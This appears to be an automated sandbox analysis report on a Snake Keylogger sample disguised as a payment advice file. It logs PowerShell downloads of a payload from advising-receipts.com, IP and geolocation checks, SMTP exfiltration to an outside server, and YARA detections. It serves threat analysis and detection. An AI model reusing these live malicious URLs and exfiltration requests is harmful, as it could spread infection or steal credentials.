Source: C:\Users\user\Desktop\Payment_Advice.exe | File opened: C:\Users\user\AppData\Local\Temp\9D53.tmp
Source: C:\Users\user\Desktop\Payment_Advice.exe | File opened: C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp
Source: C:\Users\user\Desktop\Payment_Advice.exe | File opened: C:\Users\user~1\
Source: C:\Users\user\Desktop\Payment_Advice.exe | File opened: C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.tmp
Source: C:\Users\user\Desktop\Payment_Advice.exe | File opened: C:\Users\user~1\AppData\Local\
Source: C:\Users\user\Desktop\Payment_Advice.exe | File opened: C:\Users\user~1\AppData\

            Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\Temp\hadvices.scr | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 25_2_01667550
Source: C:\Windows\Temp\hadvices.scr | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 25_2_0166793B
Source: C:\Windows\Temp\hadvices.scr | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 25_2_01667939
Source: C:\Windows\Temp\hadvices.scr | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 25_2_016680B3
Source: C:\Windows\Temp\hadvices.scr | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 25_2_01667CB2
Source: C:\Windows\Temp\hadvices.scr | Code function: 4x nop then jmp 0177FCD1h | 25_2_0177FA10
Source: C:\Windows\Temp\hadvices.scr | Code function: 4x nop then jmp 0177EFDDh | 25_2_0177EDF0
Source: C:\Windows\Temp\hadvices.scr | Code function: 4x nop then jmp 0177F967h | 25_2_0177EDF0
Source: C:\Windows\Temp\hadvices.scr | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 25_2_0177E310
Source: C:\Windows\Temp\hadvices.scr | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 25_2_0177E943
Source: C:\Windows\Temp\hadvices.scr | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 25_2_0177EB23

            Networking

            barindex
            Source: Traffic | Snort IDS: 2044767 ET TROJAN Snake Keylogger Exfil via SMTP 192.168.2.7:49743 -> 108.167.142.65:587
            Source: Traffic | Snort IDS: 2044767 ET TROJAN Snake Keylogger Exfil via SMTP 192.168.2.7:49744 -> 108.167.142.65:587
            Source: Traffic | Snort IDS: 2044767 ET TROJAN Snake Keylogger Exfil via SMTP 192.168.2.7:49745 -> 108.167.142.65:587
            Source: Traffic | Snort IDS: 2044767 ET TROJAN Snake Keylogger Exfil via SMTP 192.168.2.7:49746 -> 108.167.142.65:587
            Source: Traffic | Snort IDS: 2044767 ET TROJAN Snake Keylogger Exfil via SMTP 192.168.2.7:49747 -> 108.167.142.65:587
            Source: Yara match | File source: Payment_Advice.exe, type: SAMPLE
            Source: Yara match | File source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.0.Payment_Advice.exe.c30000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.0.hadvices.scr.990000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: C:\Windows\Temp\hadvices.scr, type: DROPPED
            Source: global traffic | TCP traffic: 192.168.2.7:49743 -> 108.167.142.65:587
            Source: global traffic | HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org
            Source: global traffic | HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org
            Source: global traffic | HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org
            Source: global traffic | HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /_send_.php?TS HTTP/1.1 Host: scratchdreams.tk Connection: Keep-Alive
            Source: Joe Sandbox View | IP Address: 172.67.169.18
            Source: Joe Sandbox View | IP Address: 193.122.130.0
            Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
            Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknown | DNS query: name: checkip.dyndns.org
            Source: unknown | DNS query: name: checkip.dyndns.org
            Source: global traffic | TCP traffic: 192.168.2.7:49743 -> 108.167.142.65:587
            Source: global traffic | HTTP traffic detected: GET /hsbc/Payment_Advice.pdf HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: advising-receipts.com Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /hsbc/hadvices.scr HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: advising-receipts.com
            Source: global traffic | HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1 Host: armmf.adobe.com Connection: keep-alive Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br If-None-Match: "78-5faa31cce96da" If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: unknown | HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49724 version: TLS 1.0
            Source: unknown | TCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknown | TCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknown | TCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknown | TCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknown | TCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknown | TCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknown | TCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknown | TCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknown | TCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknown | TCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | HTTP traffic detected: GET /hsbc/Payment_Advice.pdf HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: advising-receipts.com Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /hsbc/hadvices.scr HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: advising-receipts.com
            Source: global traffic | HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1 Host: armmf.adobe.com Connection: keep-alive Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br If-None-Match: "78-5faa31cce96da" If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
            Source: global traffic | HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org
            Source: global traffic | HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org
            Source: global traffic | HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org
            Source: global traffic | HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /_send_.php?TS HTTP/1.1 Host: scratchdreams.tk Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: global traffic | DNS traffic detected: DNS query: advising-receipts.com
            Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
            Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global traffic | DNS traffic detected: DNS query: scratchdreams.tk
            Source: global traffic | DNS traffic detected: DNS query: mail.qoldenfrontier.com
            Source: powershell.exe, 00000004.00000002.1386246749.000001B481ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1386246749.000001B4815DD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://advising-receipts.com
            Source: hadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003202000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
            Source: hadvices.scr, 00000019.00000002.2455454438.00000000032CA000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000031F3000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003202000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003245000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
            Source: hadvices.scr, 00000019.00000002.2455454438.0000000003131000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
            Source: hadvices.scr, 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
            Source: svchost.exe, 00000008.00000002.2455799913.000001E16CC00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
            Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: edb.log.8.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: Payment_Advice.exe, 00000000.00000002.1196271509.000000000124D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.mic
            Source: hadvices.scr, 00000019.00000002.2455454438.000000000345C000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003448000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.000000000343E000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003430000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003452000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003419000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.qoldenfrontier.com
            Source: powershell.exe, 00000004.00000002.1456507128.000001B490070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000004.00000002.1386246749.000001B480232000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: hadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.000000000321A000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
            Source: powershell.exe, 00000004.00000002.1386246749.000001B480001000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003131000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: hadvices.scr, 00000019.00000002.2455454438.0000000003306000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://scratchdreams.tk
            Source: powershell.exe, 00000004.00000002.1386246749.000001B480232000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000004.00000002.1386246749.000001B480C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1386246749.000001B481761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://advising-receipts.com
            Source: powershell.exe, 00000004.00000002.1460184360.000001B4E79D7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1461548989.000001B4E7D40000.00000004.00000020.00020000.00000000.sdmp, 9D55.vbs.2.dr | String found in binary or memory: https://advising-receipts.com/hsbc/Payment_Advice.pdf
            Source: powershell.exe, 00000004.00000002.1460184360.000001B4E79D7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1386246749.000001B481761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1461548989.000001B4E7D40000.00000004.00000020.00020000.00000000.sdmp, 9D55.vbs.2.dr | String found in binary or memory: https://advising-receipts.com/hsbc/hadvices.scr
            Source: powershell.exe, 00000004.00000002.1386246749.000001B480001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
            Source: edb.log.8.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
            Source: svchost.exe, 00000008.00000003.1274341677.000001E16CA80000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
            Source: powershell.exe, 00000004.00000002.1386246749.000001B480232000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000004.00000002.1386246749.000001B480C32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
            Source: powershell.exe, 00000004.00000002.1456507128.000001B490070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
            Source: qmgr.db.8.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
            Source: hadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003202000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003245000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
            Source: hadvices.scr, 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003202000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/149.18.24.96
            Source: hadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003245000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/149.18.24.96$
            Source: hadvices.scr, 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003131000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003306000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://scratchdreams.tk
            Source: hadvices.scr, 00000019.00000002.2455454438.0000000003306000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://scratchdreams.tk/_send_.php?TS
            Source: ReaderMessages.6.dr | String found in binary or memory: https://www.adobe.co
            Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknown | HTTPS traffic detected: 172.67.141.195:443 -> 192.168.2.7:49704 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.169.18:443 -> 192.168.2.7:49740 version: TLS 1.2

            System Summary

            Source: 23.2.hadvices.scr.3e03d90.4.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
            Source: 0.2.Payment_Advice.exe.5590000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
            Source: 0.2.Payment_Advice.exe.404e590.3.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
            Source: 0.2.Payment_Advice.exe.31018e4.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
            Source: 0.2.Payment_Advice.exe.31018e4.0.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
            Source: 0.2.Payment_Advice.exe.404e590.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
            Source: 0.2.Payment_Advice.exe.5590000.4.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
            Source: 23.2.hadvices.scr.5330000.5.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
            Source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
            Source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
            Source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
            Source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
            Source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
            Source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
